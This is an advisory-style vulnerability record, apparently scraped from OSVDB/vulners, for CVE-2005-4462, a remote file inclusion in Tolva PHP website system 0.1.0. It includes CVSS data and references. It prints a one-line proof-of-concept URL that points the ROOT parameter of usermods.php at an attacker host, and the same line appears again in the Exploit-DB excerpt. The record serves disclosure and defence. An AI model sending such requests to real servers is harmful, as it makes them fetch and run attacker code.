ID OSVDB:22164
Type osvdb
Reporter OSVDB
Modified 2005-12-21T22:00:36
Description
Manual Testing Notes
http://[target]/twebs/modules/misc/usermods.php?ROOT=http://[attacker_url]
References:
Vendor URL: http://sourceforge.net/projects/twebs
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0253.html
CVE-2005-4462
Bugtraq ID: 16000
{"type": "osvdb", "published": "2005-12-21T22:00:36", "href": "https://vulners.com/osvdb/OSVDB:22164", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Tolva PHP website system usermods.php ROOT Variable Remote File Inclusion", "affectedSoftware": [], "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2017-04-28T13:20:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-4462"]}, {"type": "exploitdb", "idList": ["EDB-ID:26921"]}], "modified": "2017-04-28T13:20:19", "rev": 2}, "vulnersScore": 6.2}, "references": [], "id": "OSVDB:22164", "lastseen": "2017-04-28T13:20:19", "cvelist": ["CVE-2005-4462"], "modified": "2005-12-21T22:00:36", "description": "## Manual Testing Notes\nhttp://[target]/twebs/modules/misc/usermods.php?ROOT=http://[attacker_url]\n## References:\nVendor URL: http://sourceforge.net/projects/twebs\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0253.html\n[CVE-2005-4462](https://vulners.com/cve/CVE-2005-4462)\nBugtraq ID: 16000\n"}
{"cve": [{"lastseen": "2021-02-02T05:24:40", "description": "PHP remote file include vulnerability in usermods.php in Tolva PHP website system 0.1.0 allows remote attackers to execute arbitrary code via a URL in the ROOT parameter.", "edition": 4, "cvss3": {}, "published": "2005-12-21T22:03:00", "title": "CVE-2005-4462", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4462"], "modified": "2018-10-19T15:41:00", "cpe": ["cpe:/a:tolva:tolva:0.1.0"], "id": "CVE-2005-4462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4462", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tolva:tolva:0.1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T04:42:00", "description": "Tolva 0.1 Usermods.PHP Remote File Include Vulnerability. CVE-2005-4462. Webapps exploit for php platform", "published": "2005-12-21T00:00:00", "type": "exploitdb", "title": "Tolva 0.1 Usermods.PHP Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4462"], "modified": "2005-12-21T00:00:00", "id": "EDB-ID:26921", "href": "https://www.exploit-db.com/exploits/26921/", "sourceData": "source: http://www.securityfocus.com/bid/16000/info\r\n\r\nTolva is prone to a remote file-include vulnerability.\r\n\r\nAn attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. \r\n\r\nhttp://www.example.com/twebs/modules/misc/usermods.php?ROOT=http://www.example.com ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26921/"}]}